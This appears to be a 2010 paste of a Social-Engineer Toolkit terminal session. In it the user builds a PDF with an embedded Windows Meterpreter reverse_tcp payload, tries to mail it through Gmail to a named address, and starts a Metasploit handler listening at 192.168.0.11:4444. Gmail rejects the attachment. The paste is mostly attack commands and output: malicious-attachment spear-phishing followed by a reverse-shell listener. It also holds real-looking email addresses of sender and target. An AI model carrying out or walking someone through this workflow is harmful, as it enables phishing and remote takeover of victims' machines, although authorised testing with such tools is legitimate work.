Untitled

a guest
Dec 28th, 2010
[---] The Social-Engineer Toolkit (SET) [---]
[---] Written by David Kennedy (ReL1K) [---]
[---] Version: 1.0 [---]
[---] Codename: 'Devolution' [---]
[---] Report bugs to: davek@social-engineer.org [---]
[---] Follow Me On Twitter: dave_rel1k [---]
[---] Java Applet Written by: Thomas Werth [---]
[---] Homepage: http://www.secmaniac.com [---]
[---] Framework: http://www.social-engineer.org [---]
[---] Over 1.4 million downloads and counting. [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com

Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8 Update the Metasploit Framework
9. Update the Social-Engineer Toolkit
10. Help, Credits, and About
11. Exit the Social-Engineer Toolkit

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice: 1

Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS **********

1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. Adobe Flash Player 'Button' Remote Code Execution
3. Adobe CoolType SING Table 'uniqueName' Overflow
4. Adobe Flash Player 'newfunction' Invalid Pointer Use
5. Adobe Collab.collectEmailInfo Buffer Overflow
6. Adobe Collab.getIcon Buffer Overflow
7. Adobe JBIG2Decode Memory Corruption Exploit
8. Adobe PDF Embedded EXE Social Engineering
9. Adobe util.printf() Buffer Overflow
10. Custom EXE to VBA (sent via RAR) (RAR required)
11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
12. Adobe PDF Embedded EXE Social Engineering (NOJS)

Enter the number you want (press enter for default): 8
You have selected the default payload creation. SET will generate a normal PDF with embedded EXE.

1. Use your own PDF for attack
2. Use built-in BLANK PDF for attack

Enter your choice (return for default): 1
Enter path to your pdf (enter for default):
[*] Defaulting to BLANK PDF built into SET...
[*] Unable to find PDF, defaulting to blank PDF.

1. Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker.
2. Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6. Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system.
7. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter

Enter the payload you want (press enter for default): 2
Enter the port to connect back on (press enter for default): 4444
[*] Generating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the src/program_junk/template.pdf directory


As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

Enter your choice (enter for default): 2
Enter the new filename: practica.pdf
Filename changed, moving on...

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 2
Enter the subject of the email: practica

Do you want to send the message as html or plain?

1. HTML
2. Plain

Enter your choice (enter for plain): 1

Enter the body of the message, hit return for a new line.

Type your body and enter control+c when finished: practica
Next line of the body: de
Next line of the body: SET
Next line of the body: ^C
Enter who you want to send email to: dannyLopez68@gmail.com

What option do you want to use?

1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1
Enter your GMAIL email address: z3r0f15h@gmail.com
Enter your password for gmail (it will not be displayed back to you):
(552, '5.7.0 Our system detected an illegal attachment on your message. Please\n5.7.0 visit http://mail.google.com/support/bin/answer.py?answer=6590 to\n5.7.0 review our attachment guidelines. x36sm18742937anx.34')
(8, 'EOF occurred in violation of protocol')

It appears your password was incorrect.
Printing response: (8, 'EOF occurred in violation of protocol')
Press enter to continue.


SET has finished delivering the emails.

Do you want to setup a listener yes or no: yes
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


       =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 639 exploits - 319 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r11425 updated today (2010.12.27)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.0.11
LHOST => 192.168.0.11
resource (src/program_junk/meta_config)> set LPORT 4444
LPORT => 4444
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.0.11:4444
[*] Starting the payload handler...